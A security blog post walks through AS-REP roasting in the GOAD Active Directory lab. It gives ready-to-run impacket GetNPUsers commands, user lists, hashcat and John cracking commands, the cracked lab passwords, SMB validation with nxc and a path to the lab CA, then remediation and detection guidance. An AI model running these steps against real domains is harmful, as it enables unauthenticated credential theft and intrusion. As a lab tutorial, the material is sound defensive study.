AS-REP Roasting Across the Forest

Published by Matt Clemons on

GOAD provisions AS-REP roasting through its vulnerabilities.yml ansible play, which calls the asrep_roasting role. That role runs Set-ADAccountControl to set DoesNotRequirePreAuth on specific accounts. In north.sevenkingdoms.local, the designated account is brandon.stark. In essos.local, it is missandei. No accounts in sevenkingdoms.local have the flag set.

Nothing needs to be configured manually. Both flags are present after the standard provisioning run.

How It Works

Kerberos pre-authentication requires a client to prove knowledge of their password before the KDC issues a TGT. It does this by encrypting a timestamp with the user’s key and including it as PA-ENC-TIMESTAMP in the AS-REQ. When UF_DONT_REQUIRE_PREAUTH is set, the KDC skips that check entirely and returns an AS-REP without validating the caller’s identity. The response contains a blob encrypted with the user’s password-derived key. An attacker can request that blob unauthenticated, take it offline, and crack it.

Enumeration

Impacket’s GetNPUsers.py requests AS-REPs for a given user list without supplying credentials. Winterfell and Meereen both accept unauthenticated requests, so no prior foothold is needed. Kingslanding is included for completeness. Build a username list for each domain first:

cat > north_users.txt << 'EOF'
arya.stark
eddard.stark
catelyn.stark
robb.stark
sansa.stark
brandon.stark
rickon.stark
hodor
jon.snow
samwell.tarly
jeor.mormont
sql_svc
administrator
EOF

cat > essos_users.txt << 'EOF'
daenerys.targaryen
viserys.targaryen
khal.drogo
missandei
drogon
jorah.mormont
sql_svc
administrator
EOF

cat > sk_users.txt << 'EOF'
tywin.lannister
jaime.lannister
cersei.lannister
tyron.lannister
robert.baratheon
joffrey.baratheon
renly.baratheon
stannis.baratheon
petyer.baelish
lord.varys
maester.pycelle
administrator
EOF

Then spray all three DCs, redirecting output into a single hashes file:

impacket-GetNPUsers north.sevenkingdoms.local/ \
  -dc-ip 10.3.10.11 -no-pass \
  -usersfile north_users.txt -format hashcat \
  2>/dev/null >> asrep_hashes.txt

impacket-GetNPUsers essos.local/ \
  -dc-ip 10.3.10.12 -no-pass \
  -usersfile essos_users.txt -format hashcat \
  2>/dev/null >> asrep_hashes.txt

impacket-GetNPUsers sevenkingdoms.local/ \
  -dc-ip 10.3.10.10 -no-pass \
  -usersfile sk_users.txt -format hashcat \
  2>/dev/null >> asrep_hashes.txt
```

North and essos each contribute a hash. Sevenkingdoms returns nothing. `asrep_hashes.txt` ends up with two entries:
```
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:3cbcb5674dee52f5670c4fdfa0a71d2e$...
$krb5asrep$23$missandei@ESSOS.LOCAL:8db94b0fa432d6e8ed91995c9f5b586b$...

After cracking, authenticated LDAP sweeps confirm no accounts were missed by the unauthenticated pass:

impacket-GetNPUsers north.sevenkingdoms.local/brandon.stark:iseedeadpeople \
  -dc-ip 10.3.10.11 -request -format hashcat

impacket-GetNPUsers essos.local/missandei:fr3edom \
  -dc-ip 10.3.10.12 -request -format hashcat

Both runs return the same single account each.

Cracking

Both hashes are krb5asrep type 23 (RC4-HMAC). Hashcat mode 18200:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -O

Or with John:

john asrep_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep
```

John cracks both in 8 seconds on CPU alone:
```
iseedeadpeople   ($krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL)
fr3edom          ($krb5asrep$23$missandei@ESSOS.LOCAL)
2g 0:00:00:08 DONE (2026-03-01 14:49) 0.2412g/s 216596p/s

Confirm both against SMB:

nxc smb 10.3.10.11 -u brandon.stark -p iseedeadpeople -d north.sevenkingdoms.local
nxc smb 10.3.10.12 -u missandei -p fr3edom -d essos.local
```
```
SMB  10.3.10.11  445  WINTERFELL  [+] north.sevenkingdoms.local\brandon.stark:iseedeadpeople
SMB  10.3.10.12  445  MEEREEN     [+] essos.local\missandei:fr3edom

Impact

brandon.stark has no significant ACL rights directly but provides a valid authenticated foothold into north for LDAP enumeration, Kerberoasting, and further ACL abuse chains. missandei is considerably more useful: she holds GenericAll over khal.drogo, who holds ManageCa and ManageCertificates on ESSOS-CA and is a local admin on Braavos. Two unauthenticated requests and a dictionary attack is enough to land on a path to the essos CA.

A Note on Encryption Types

The hashes above are RC4 (etype 23) because GetNPUsers.py requests that type by default and the accounts have no forced encryption policy. If AES-only is enforced (msDS-SupportedEncryptionTypes set to 24), the KDC returns etype 17 or 18 instead. The attack still works, the hash is still offline crackable, but AES-based AS-REPs are significantly slower to crack than RC4. Weak passwords will still fall; anything resembling a real passphrase likely won’t. This is not a reason to rely on AES, it is a reason to fix the flag.

Remediation

Enable pre-authentication on every account that has it disabled. There is almost no legitimate reason to disable it for standard user accounts.

Set-ADAccountControl -Identity brandon.stark -DoesNotRequirePreAuth $false
Set-ADAccountControl -Identity missandei -DoesNotRequirePreAuth $false

Find all vulnerable accounts in a domain:

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth

Beyond fixing the flag, enforce long random passwords on any account that genuinely requires it. A 25-character random password does not prevent AS-REP collection but makes offline cracking impractical regardless of etype. For detection, Windows event ID 4768 with pre-authentication type 0x0 identifies AS-REQ packets where no pre-auth was supplied. It fires once per request, is not noisy, and should alert immediately.

Categories: SecurityWindows

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Security

GMSA Password Retrieval — Abusing msDS-ManagedPassword

Group Managed Service Accounts (gMSAs) were introduced to solve a real problem: service accounts with static passwords. Traditional service accounts require someone to set a password, store it somewhere, and rotate it manually. In practice, Read more

Security

LAPS Password Retrieval via ACL Access

Local Administrator Password Solution (LAPS) solves a real problem. Before it existed, most Windows environments reused the same local administrator password across every machine in the domain. Compromise one host, and you had credentials that Read more

Security

DCSync Without Domain Admin: Explicit Replication Rights

DCSync does not require Domain Admin membership. The underlying mechanism, the Directory Replication Service Remote Protocol (DRSR), only checks two ACEs on the domain naming context head: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Any principal with both ACEs Read more